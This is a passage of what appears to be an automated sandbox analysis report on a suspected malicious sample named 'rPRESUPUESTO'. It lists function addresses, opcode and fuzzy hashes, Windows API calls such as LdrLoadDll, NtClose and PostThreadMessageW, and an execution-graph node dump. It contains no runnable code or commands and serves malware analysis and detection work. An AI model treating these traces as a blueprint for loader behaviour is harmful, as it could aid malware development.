                                                • Instruction ID: dcbaecc2d397247d86faffb4f123512da67cd1bc42a79a47d9ac867aae3cfa9b
                                                • Opcode Fuzzy Hash: 3c0ee0e8b51700b274b4ea2ba913b6fba72d8dbde4f07c0d5d812f406072eb2a
                                                • Instruction Fuzzy Hash: 70118FB1D002498FDB10DFA9C4457DEFBF4EF98320F148419C519A7240DB35A944CF94
                                                Function 07879230 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 795e83b50adda1d4dfc7dd96f8ea90ec6f8300166003e50bae6d52c3609c0646
                                                • Instruction ID: 8dd5b38befcd38dd6876f80c8ce514304a8f95750bfe15aba84bc85dcbed0b1a
                                                • Opcode Fuzzy Hash: 795e83b50adda1d4dfc7dd96f8ea90ec6f8300166003e50bae6d52c3609c0646
                                                • Instruction Fuzzy Hash: DC113AB1D002498FDB20DFAAC8457DEFBF4EF98324F248419D519A7240DB75A944CBA4
                                                Function 0110B338 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0110B39E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b961fd26ce8acf61d282d4460eca4d8bd41a94095928a023814f9eca04b6d5e3
                                                • Instruction ID: 778d5f21159be338c8d1ed9e4d75dc2db02dccc29ebbc4b0a508116dd1461c97
                                                • Opcode Fuzzy Hash: b961fd26ce8acf61d282d4460eca4d8bd41a94095928a023814f9eca04b6d5e3
                                                • Instruction Fuzzy Hash: E71110BAC043498FDB14CF9AC844ADEFBF4EB88324F20841AD919B7240C375A545CFA5
                                                Function 078729F0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0787C455
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 7f6affe58c3f57b536e89b04c02ed0c6bc4264e7cec12d84a1fd6d3fb9fc772e
                                                • Instruction ID: 1a2ed52c505d2cc8d2e19e78564c63aac944063686d512fd1db3786a63d61757
                                                • Opcode Fuzzy Hash: 7f6affe58c3f57b536e89b04c02ed0c6bc4264e7cec12d84a1fd6d3fb9fc772e
                                                • Instruction Fuzzy Hash: 181103B5800349DFDB10CF9AC849BEEBBF8EB59324F108419E919B7200C375A944CFA5
                                                Function 0787C3F1 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0787C455
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 21c6a654f268850d2bea8fe5174271f1987dd458d4782628623be46d023d6607
                                                • Instruction ID: 4b39085ddde2b7d90712f484923c709359c5311a0722949eaa7c6c7804a2b799
                                                • Opcode Fuzzy Hash: 21c6a654f268850d2bea8fe5174271f1987dd458d4782628623be46d023d6607
                                                • Instruction Fuzzy Hash: A611F5B5800249DFDB10CF99C885BDEBBF8EB58320F148419D918A3200C375A544CFA5
                                                Function 00C7D0B8 Relevance: .1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2153561672.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_c7d000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10e53d6883eb07a0c02c1c2ce5597f6edcb34d678be05efe3aacfa26b3267324
                                                • Instruction ID: b775a75a86dcfd78b682d5cfb5423bb5f9dcdfce63df4f4cd2a75e827408675d
                                                • Opcode Fuzzy Hash: 10e53d6883eb07a0c02c1c2ce5597f6edcb34d678be05efe3aacfa26b3267324
                                                • Instruction Fuzzy Hash: 5321F4B2504240DFCB15DF14D9C0B2ABF75FF88324F64C569E90E1A256C33AD856CB61
                                                Function 00C8D36C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2153653819.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_c8d000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f858b1bee4d830648987b6adfda8e5e8258213a9070fb484e2413b0a099a3a9
                                                • Instruction ID: 21bf3dd41d40cbdf12a1436d5e3e592d62feb5294df12c20ef93a33b3083d450
                                                • Opcode Fuzzy Hash: 0f858b1bee4d830648987b6adfda8e5e8258213a9070fb484e2413b0a099a3a9
                                                • Instruction Fuzzy Hash: 2F210775504304DFCB05EF14D9C4B16BB65FB84328F24C96DD90A4B2D6C336E846CB66
                                                Function 00C8D1B4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2153653819.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_c8d000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ca5a521df529eebf8dced4ef6579350c5fadbacaca5badf69dbaa01750f4e44
                                                • Instruction ID: 6671b701584bed7aa03253d76a089b1400d70d93aea5bc626e25d4b679322ca0
                                                • Opcode Fuzzy Hash: 7ca5a521df529eebf8dced4ef6579350c5fadbacaca5badf69dbaa01750f4e44
                                                • Instruction Fuzzy Hash: 3721F675504304DFDB05EF54D9C4B26BB65FB84328F24C96DE80A4B296C33ADC46CB65
                                                Function 00C7D0B3 Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2153561672.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_c7d000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3b49ebb3647464524db950c25b84bc30cf7f483e8b35816b047356ddc5e1881
                                                • Instruction ID: deac610e3127e07b1ea76522b0df88fe40dade80426fa3d89c8bf1307fa89d74
                                                • Opcode Fuzzy Hash: f3b49ebb3647464524db950c25b84bc30cf7f483e8b35816b047356ddc5e1881
                                                • Instruction Fuzzy Hash: F4218E76504280DFCB16CF10D9C4B1ABF72FF98324F24C6A9E9490A256C33AD956CB91
                                                Function 00C8D1AF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2153653819.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_c8d000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                • Instruction ID: 516c931aded166158fd63c34f6d83dc34ea9145e2cd6d6bd006220fe7dcb4ac0
                                                • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                • Instruction Fuzzy Hash: 7011DD75504280CFCB02DF14D5C4B15BBB1FB84318F24C6ADD84A4B696C33AD94ACBA1
                                                Function 00C8D367 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2153653819.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_c8d000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                • Instruction ID: c53f338a71ffd55f9618534f03b6865e3bf5a3e61df879e125a89891b209da7b
                                                • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                • Instruction Fuzzy Hash: 66119D76504280DFDB06DF14D5C4B15BBB2FB84318F24C6ADD84A4B696C33AE94ACB62
                                                Function 00C7D7C5 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2153561672.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_c7d000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e03eaabe67aed53158ebd8836601f6432eaed6ba7c2fcfd07d892499a392839c
                                                • Instruction ID: de8923a4e92a1329b59f5378aa9e98dddb9ffb723a97e1a32a6d8aa8c956096c
                                                • Opcode Fuzzy Hash: e03eaabe67aed53158ebd8836601f6432eaed6ba7c2fcfd07d892499a392839c
                                                • Instruction Fuzzy Hash: 6B012B714043449AE7218B1ACD84726BFB8EF41334F28C45AED1E4A2C7C7399941C6F2
                                                Function 00C7D7C4 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2153561672.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_c7d000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37e2bfff3d1b112bbc1b6e2f0bd5f0015a7cbfc3987b46263f4b492edf1b3fa1
                                                • Instruction ID: 1537267081c3e0cb6e29b78554aaebd09555bc8c4bbdb86e4b306671f548b8a8
                                                • Opcode Fuzzy Hash: 37e2bfff3d1b112bbc1b6e2f0bd5f0015a7cbfc3987b46263f4b492edf1b3fa1
                                                • Instruction Fuzzy Hash: 81F0C272404344AAE7108F05CD84B62FFA8EF51334F18C05AED0D4A287C379A840CAB1

                                                Non-executed Functions

                                                Function 0787ECC0 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHeq$PHeq
                                                • API String ID: 0-3382621680
                                                • Opcode ID: eb2d48643c809417e63df41060046c873649961ec3bec180cbaff0f7585d38cb
                                                • Instruction ID: 70ecc3f6bb77cb3f11ce76f06f57770eae2591cce5837711be5b277300f44d2c
                                                • Opcode Fuzzy Hash: eb2d48643c809417e63df41060046c873649961ec3bec180cbaff0f7585d38cb
                                                • Instruction Fuzzy Hash: 4CD1C1B5A00609CFDB08CF69C598AA9B7F1AF59305F2580E9E506EB361DB31ED41CF60
                                                Function 078787A8 Relevance: .5, Instructions: 498COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ec4470fbdb1ba594425b12d422300c1b9bdfaec3e82018db11b19d358570864
                                                • Instruction ID: d57b60c924b105d35cca3476502380cb6641f384db800f44f48632f073eb93a2
                                                • Opcode Fuzzy Hash: 2ec4470fbdb1ba594425b12d422300c1b9bdfaec3e82018db11b19d358570864
                                                • Instruction Fuzzy Hash: 7E223CB0E042198FCB14DF98C588AADBBF2BF99314F248169D459EB355D731E881CFA1
                                                Function 07877768 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09062f447e2f3ccf2f9199af425edd0e6d0719d09835a08cd12a67f0705a96a6
                                                • Instruction ID: b18ca4683bdd17d29d356b45ae23417c6b804c05b3f9045a650af29948a72453
                                                • Opcode Fuzzy Hash: 09062f447e2f3ccf2f9199af425edd0e6d0719d09835a08cd12a67f0705a96a6
                                                • Instruction Fuzzy Hash: 99E10BB4E042198FDB14DFA9C580AAEFBF2FF89304F248169D455AB355D734A981CFA0
                                                Function 07877330 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aabc2e0734d915fe8459b15c1c7a3f8540bc88a5abb15ec00267f89163795c5d
                                                • Instruction ID: 1afd4bd7cc3ef154ce443a6f489c4053e9da1ab15d1aa84c665923446e96cd91
                                                • Opcode Fuzzy Hash: aabc2e0734d915fe8459b15c1c7a3f8540bc88a5abb15ec00267f89163795c5d
                                                • Instruction Fuzzy Hash: E7E1E8B4E042198FCB14DFA9C580AAEFBF2FF89304F249169E515AB359D730A941CF61
                                                Function 078792E0 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32acb55b1524649aeeb3533c2b00f1f57eab127948a0e639cb55f72976777a3a
                                                • Instruction ID: 77c7a2df41d96f0d9524bc24cb647b0480033a5b236b863f9290e09d6546bdcd
                                                • Opcode Fuzzy Hash: 32acb55b1524649aeeb3533c2b00f1f57eab127948a0e639cb55f72976777a3a
                                                • Instruction Fuzzy Hash: 35E1E8B4E042198FCB14DFA9C5809AEFBF2FF89304F249169E555AB359D730A981CF60
                                                Function 07876EF8 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2cd5de647c0249a63e34079f760025946a68389f6dc262358ca0ff28dda74724
                                                • Instruction ID: 894e245b758806be0c38bc396269e8074e3bfd979140271ae10a0218f36f98df
                                                • Opcode Fuzzy Hash: 2cd5de647c0249a63e34079f760025946a68389f6dc262358ca0ff28dda74724
                                                • Instruction Fuzzy Hash: B2E1FAB4E042198FCB14DFA9C5809AEFBF2FF89305F248169E415AB355D731A981CF61
                                                Function 0110DF14 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0edc3c4c7dc22b5f121e0626e3842456ab33ade34971321245fb6560733f4879
                                                • Instruction ID: 7023a5f43134acba77041427a95ca7369b6dce2d979cec44a6e8c2521e77aed4
                                                • Opcode Fuzzy Hash: 0edc3c4c7dc22b5f121e0626e3842456ab33ade34971321245fb6560733f4879
                                                • Instruction Fuzzy Hash: DAA19332E00216CFCF1ADFB5D8445DEB7B2FF84304B15856AE901AB295DB71D956CB80
                                                Function 078789F8 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14d60d9c44bf5813c31e3b19c5238a6c9755eddb83920bac83b25d8546a399f8
                                                • Instruction ID: a6b55e66c25f9cc59af9796cf9eba03b7cb00160af137d91d7ce23c85baadc34
                                                • Opcode Fuzzy Hash: 14d60d9c44bf5813c31e3b19c5238a6c9755eddb83920bac83b25d8546a399f8
                                                • Instruction Fuzzy Hash: 6A512CB0E042198FCB14DFA9C5445AEFBF2FF89304F24816AD419AB356D7319941CFA1

                                                Execution Graph

                                                Execution Coverage:1.1%
                                                Dynamic/Decrypted Code Coverage:4.7%
                                                Signature Coverage:7.3%
                                                Total number of Nodes:150
                                                Total number of Limit Nodes:10
                                                execution_graph 94076 424463 94077 42447f 94076->94077 94078 4244a7 94077->94078 94079 4244bb 94077->94079 94080 42b623 NtClose 94078->94080 94086 42b623 94079->94086 94082 4244b0 94080->94082 94083 4244c4 94089 42d623 RtlAllocateHeap 94083->94089 94085 4244cf 94087 42b63d 94086->94087 94088 42b64e NtClose 94087->94088 94088->94083 94089->94085 94090 42e5e3 94091 42e5f3 94090->94091 94092 42e5f9 94090->94092 94095 42d5e3 94092->94095 94094 42e61f 94098 42b923 94095->94098 94097 42d5fe 94097->94094 94099 42b93d 94098->94099 94100 42b94e RtlAllocateHeap 94099->94100 94100->94097 94101 42ac83 94102 42aca0 94101->94102 94105 1812df0 LdrInitializeThunk 94102->94105 94103 42acc8 94105->94103 94106 1812b60 LdrInitializeThunk 94134 4247f3 94135 424802 94134->94135 94136 427b43 RtlAllocateHeap 94135->94136 94138 42481b 94136->94138 94137 424849 94144 42d503 94137->94144 94138->94137 94141 424884 94138->94141 94143 424889 94138->94143 94142 42d503 RtlFreeHeap 94141->94142 94142->94143 94147 42b973 94144->94147 94146 424856 94148 42b98d 94147->94148 94149 42b99e RtlFreeHeap 94148->94149 94149->94146 94107 4141e3 94108 4141fd 94107->94108 94113 417bb3 94108->94113 94110 41421b 94111 414260 94110->94111 94112 41424f PostThreadMessageW 94110->94112 94112->94111 94114 417bd7 94113->94114 94115 417c13 LdrLoadDll 94114->94115 94116 417bde 94114->94116 94115->94116 94116->94110 94150 41e2d3 94151 41e2f9 94150->94151 94155 41e3e7 94151->94155 94156 42e713 94151->94156 94153 41e38b 94153->94155 94162 42acd3 94153->94162 94157 42e683 94156->94157 94158 42d5e3 RtlAllocateHeap 94157->94158 94161 42e6e0 94157->94161 94159 42e6bd 94158->94159 94160 42d503 RtlFreeHeap 94159->94160 94160->94161 94161->94153 94163 42aced 94162->94163 94166 1812c0a 94163->94166 94164 42ad19 94164->94155 94167 1812c11 94166->94167 94168 1812c1f LdrInitializeThunk 94166->94168 94167->94164 94168->94164 94169 41b1f3 94170 41b237 94169->94170 94171 42b623 NtClose 94170->94171 94172 41b258 94170->94172 94171->94172 94173 401a15 94174 401a2a 94173->94174 94177 42eaa3 94174->94177 94180 42d0f3 94177->94180 94181 42d119 94180->94181 94192 4074f3 94181->94192 94183 42d12f 94184 401a5d 94183->94184 94195 41b003 94183->94195 94186 42d14e 94187 42d163 94186->94187 94210 42b9c3 94186->94210 94206 427723 94187->94206 94190 42d172 94191 42b9c3 ExitProcess 94190->94191 94191->94184 94213 4168e3 94192->94213 94194 407500 94194->94183 94196 41b02f 94195->94196 94226 41aef3 94196->94226 94199 41b05c 94200 42b623 NtClose 94199->94200 94203 41b067 94199->94203 94200->94203 94201 41b090 94201->94186 94202 41b074 94202->94201 94204 42b623 NtClose 94202->94204 94203->94186 94205 41b086 94204->94205 94205->94186 94207 42777d 94206->94207 94209 42778a 94207->94209 94237 418703 94207->94237 94209->94190 94211 42b9dd 94210->94211 94212 42b9ee ExitProcess 94211->94212 94212->94187 94214 4168fa 94213->94214 94216 416913 94214->94216 94217 42c083 94214->94217 94216->94194 94218 42c09b 94217->94218 94219 427b43 RtlAllocateHeap 94218->94219 94221 42c0b6 94219->94221 94220 42c0bf 94220->94216 94221->94220 94222 42acd3 LdrInitializeThunk 94221->94222 94223 42c114 94222->94223 94224 42d503 RtlFreeHeap 94223->94224 94225 42c12d 94224->94225 94225->94216 94227 41af0d 94226->94227 94231 41afe9 94226->94231 94232 42ad73 94227->94232 94230 42b623 NtClose 94230->94231 94231->94199 94231->94202 94233 42ad8d 94232->94233 94236 18135c0 LdrInitializeThunk 94233->94236 94234 41afdd 94234->94230 94236->94234 94239 41872d 94237->94239 94238 418b9b 94238->94209 94239->94238 94245 414313 94239->94245 94241 41883a 94241->94238 94242 42d503 RtlFreeHeap 94241->94242 94243 418852 94242->94243 94243->94238 94244 42b9c3 ExitProcess 94243->94244 94244->94238 94247 414332 94245->94247 94246 414450 94246->94241 94247->94246 94249 413d63 LdrInitializeThunk 94247->94249 94249->94246 94250 418db8 94251 42b623 NtClose 94250->94251 94252 418dc2 94251->94252 94253 413dba 94254 413d6f 94253->94254 94257 42b893 94254->94257 94258 42b8ad 94257->94258 94261 1812c70 LdrInitializeThunk 94258->94261 94259 413d85 94261->94259 94117 4149ef 94118 4149a3 94117->94118 94122 414982 94117->94122 94119 4149af 94118->94119 94124 427b43 94118->94124 94121 414a02 94122->94121 94123 427b43 RtlAllocateHeap 94122->94123 94123->94119 94125 427ba0 94124->94125 94126 427bd7 94125->94126 94129 424503 94125->94129 94126->94119 94128 427bb9 94128->94119 94130 4244ca 94129->94130 94130->94129 94132 4244cf 94130->94132 94133 42d623 RtlAllocateHeap 94130->94133 94132->94128 94133->94132

                                                Executed Functions

                                                Function 00417BB3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 109 417bb3-417bdc call 42e203 112 417be2-417bf0 call 42e723 109->112 113 417bde-417be1 109->113 116 417c00-417c11 call 42cbc3 112->116 117 417bf2-417bfd call 42e9c3 112->117 122 417c13-417c27 LdrLoadDll 116->122 123 417c2a-417c2d 116->123 117->116 122->123
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C25
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 089cd7b1e32230f99f08fb05e4885b961d1b1c57f8a4bd243221de915f3ec884
                                                • Instruction ID: 4328c0b8ac73ff2424a135461264386c77204433aa08a2932818e139f239ad44
                                                • Opcode Fuzzy Hash: 089cd7b1e32230f99f08fb05e4885b961d1b1c57f8a4bd243221de915f3ec884
                                                • Instruction Fuzzy Hash: 41011EB5E0420DBBDB10EBA5DC42FDEB778AB54308F00419AE91897241FA35EB548B95
                                                Function 0042B623 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 124 42b623-42b65c call 404933 call 42c6d3 NtClose
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 4c66793653d15117f357d01f0f2892b2c5ef3b68542122b1a45f0b0588971228
                                                • Instruction ID: 0ffedaf792a4ad4517e88bc314bd88d5aba1219f27c0b25af2807f74d76067d9
                                                • Opcode Fuzzy Hash: 4c66793653d15117f357d01f0f2892b2c5ef3b68542122b1a45f0b0588971228
                                                • Instruction Fuzzy Hash: 14E08C722406147BC220EA6ADC41F9BB7ACDFC5715F00402AFA0CAB242D670BA058BF4
                                                Function 01812B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 138 1812b60-1812b6c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8acd668385cafe028139793b7531478e84e9a30557f8c8e85032e2f40671694c
                                                • Instruction ID: 1b6f9368f38854a1e7e43305ee862ba5052db39c601449f41626bd50172597bf
                                                • Opcode Fuzzy Hash: 8acd668385cafe028139793b7531478e84e9a30557f8c8e85032e2f40671694c
                                                • Instruction Fuzzy Hash: DA90026120241007450671584415616404A97E1301B55C021E6028590DC9258AD56226
                                                Function 01812DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a9efdf416b95ef5c2006c012b51f17d293dbffb2088d5de79bfca56271637e4c
                                                • Instruction ID: b6459f3edac44bdf89660490404d8ab24c4872c40b9c9aff465eae100ee13c8e
                                                • Opcode Fuzzy Hash: a9efdf416b95ef5c2006c012b51f17d293dbffb2088d5de79bfca56271637e4c
                                                • Instruction Fuzzy Hash: A090023120141417D51271584505707004997D1341F95C412E5438558DDA568B96A222
                                                Function 01812C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 13cb389ae476d0ef52cd17d278a4fa07f95ac71ad8ad8ad1813e99a4aa31ac6f
                                                • Instruction ID: 64ee5e008ccd1cbe1113d2d323223580a9ca97d6900696a487d90a2a79887d76
                                                • Opcode Fuzzy Hash: 13cb389ae476d0ef52cd17d278a4fa07f95ac71ad8ad8ad1813e99a4aa31ac6f
                                                • Instruction Fuzzy Hash: C390023120149806D5117158840574A004597D1301F59C411E9438658DCA958AD57222
                                                Function 018135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
